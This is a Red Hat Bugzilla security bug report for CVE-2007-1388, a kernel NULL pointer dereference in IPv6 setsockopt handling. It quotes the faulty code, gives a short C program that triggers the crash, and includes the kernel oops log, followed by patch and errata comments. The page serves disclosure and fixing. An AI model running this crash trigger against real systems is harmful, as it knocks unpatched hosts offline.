Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 232255 - CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
Summary: CVE-2007-1388 NULL pointer dereference in do_ipv6_setsockopt
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Enterprise Linux 5
Classification: Red Hat
Component: kernel
Version: 5.0
Hardware: All
OS: Linux
medium
high
Target Milestone: ---
: ---
Assignee: Don Howard
QA Contact: Martin Jenner
URL:
Whiteboard: impact=important,source=vendorsec,rep...
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2007-03-14 16:00 UTC by Marcel Holtmann
Modified: 2007-11-30 22:07 UTC (History)
1 user (show)

Fixed In Version: RHSA-2007-0169
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2007-04-30 16:37:48 UTC


Attachments (Terms of Use)


Links
System ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2007:0169 normal SHIPPED_LIVE Important: kernel security and bug fix update 2007-04-30 16:36:50 UTC

Description Marcel Holtmann 2007-03-14 16:00:56 UTC
There is a NULL pointer dereference in the function do_ipv6_setsockopt in
net/ipv6/ipv6_sockglue.c.
Line 417, opt can be NULL and dereferenced :
		opt = ipv6_renew_options(sk, np->opt, optname,    // opt = NULL
					 (struct ipv6_opt_hdr __user *)optval,
					 optlen);
		if (IS_ERR(opt)) {
			retv = PTR_ERR(opt);
			break;
		}

		/* routing header option needs extra check */
		if (optname == IPV6_RTHDR && opt->srcrt) {        // Oops


Those few lines reproduce the bug :

#include <netinet/in.h>

int main(int argc, char **argv) {
  int s, optval;

  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  setsockopt(s, SOL_IPV6, IPV6_RTHDR, &optval, 0);

  return 0;
}


Kernel Oops here :

Mar  8 23:57:17 localhost kernel: BUG: unable to handle kernel NULL pointer
dereference at virtual address 00000010
Mar  8 23:57:17 localhost kernel:  printing eip:
Mar  8 23:57:17 localhost kernel: f8ebb270
Mar  8 23:57:17 localhost kernel: *pde = 00000000
Mar  8 23:57:17 localhost kernel: Oops: 0000 [#1]
Mar  8 23:57:17 localhost kernel: Modules linked in: binfmt_misc rfcomm hidp
l2cap bluetooth fglrx speedstep_centrino cpufreq_userspace cpufreq_stats
freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video
tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_core hotkey dev_acpi button battery
container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod ipv6 parport_pc lp
parport 8139cp joydev tsdev usbhid pcmcia tifm_7xx1 tifm_core sdhci mmc_core
8139too mii snd_intel8x0 snd_ac97_codec snd_ac97_bus ipw2200 snd_pcm_oss
snd_mixer_oss yenta_socket rsrc_nonstatic pcmcia_core snd_pcm ieee80211
ieee80211_crypt psmouse serio_raw evdev snd_timer shpchp pci_hotplug intel_agp
agpgart snd soundcore snd_page_alloc rtc ext3 jbd ohci1394 ieee1394 ehci_hcd
uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal
processor fan capability commoncap vesafb fbcon tileblit font bitblit softcursor
Mar  8 23:57:17 localhost kernel: CPU:    0
Mar  8 23:57:17 localhost kernel: EIP:    0060:[<f8ebb270>]    Tainted: P      VLI
Mar  8 23:57:17 localhost kernel: EFLAGS: 00010246   (2.6.17-11-386 #2) 
Mar  8 23:57:17 localhost kernel: EIP is at ipv6_setsockopt+0xa90/0xc40 [ipv6]
Mar  8 23:57:17 localhost kernel: eax: 00000000   ebx: f0cfca40   ecx: 00000039
  edx: 00000000
Mar  8 23:57:17 localhost kernel: esi: 00000000   edi: 00000000   ebp: 00000039
  esp: f25a9da8
Mar  8 23:57:17 localhost kernel: ds: 007b   es: 007b   ss: 0068
Mar  8 23:57:17 localhost kernel: Process null_deref (pid: 5076,
threadinfo=f25a8000 task=f24a7580)
Mar  8 23:57:17 localhost kernel: Stack: 00000000 00000000 c199ce00 f8c9a4ff
00000001 00000000 f0cfce58 ee42e9c0 
Mar  8 23:57:17 localhost kernel:        c18e1e7c c0179c74 3b9aca00 c199ce00
c18e1de0 ee42e9c0 c18e1e7c 00000000 
Mar  8 23:57:17 localhost kernel:        c199ce00 00000000 ee42e9c0 c18e1e7c
00000000 c013c78b 00001000 c0359330 
Mar  8 23:57:17 localhost kernel: Call Trace:
Mar  8 23:57:17 localhost kernel:  <c0179c74> __mark_inode_dirty+0x34/0x170 
<c013c78b> do_generic_mapping_read+0x42b/0x540
Mar  8 23:57:17 localhost kernel:  <c0154f74> cache_alloc_refill+0x314/0x4d0 
<c01cc98c> vsnprintf+0x55c/0x640
Mar  8 23:57:17 localhost kernel:  <c016f0b7> d_alloc+0x27/0x190  <c016f059>
d_instantiate+0x49/0x80
Mar  8 23:57:17 localhost kernel:  <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6] 
<c0289966> tcp_setsockopt+0x36/0x370
Mar  8 23:57:17 localhost kernel:  <c0259e83> sock_common_setsockopt+0x23/0x30 
<c02587d5> sys_setsockopt+0x75/0xd0
Mar  8 23:57:17 localhost kernel:  <c0259a19> sys_socketcall+0x209/0x280 
<c02c7a00> do_page_fault+0x0/0x6e0
Mar  8 23:57:17 localhost kernel:  <c0102dbb> sysenter_past_esp+0x54/0x79 
Mar  8 23:57:17 localhost kernel: Code: 00 00 d0 54 2a c0 ff 0d 80 88 ee f8 83
3d 80 87 ee f8 02 0f 85 34 fc ff ff a1 08 89 ee f8 31 ff e8 56 ab 25 c7 e9 d5 f6
ff ff 90 <8b> 50 10 85 d2 0f 84 3e f9 ff ff 80 7a 02 00 90 75 13 0f b6 42 
Mar  8 23:57:17 localhost kernel: EIP: [<f8ebb270>] ipv6_setsockopt+0xa90/0xc40
[ipv6] SS:ESP 0068:f25a9da8

Comment 3 Don Howard 2007-03-29 21:41:56 UTC
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.

Comment 5 Mike Gahagan 2007-04-26 22:13:28 UTC
verified on x86_64 system.


Comment 7 Red Hat Bugzilla 2007-04-30 16:37:48 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2007-0169.html



Note You need to log in before you can comment on or make changes to this bug.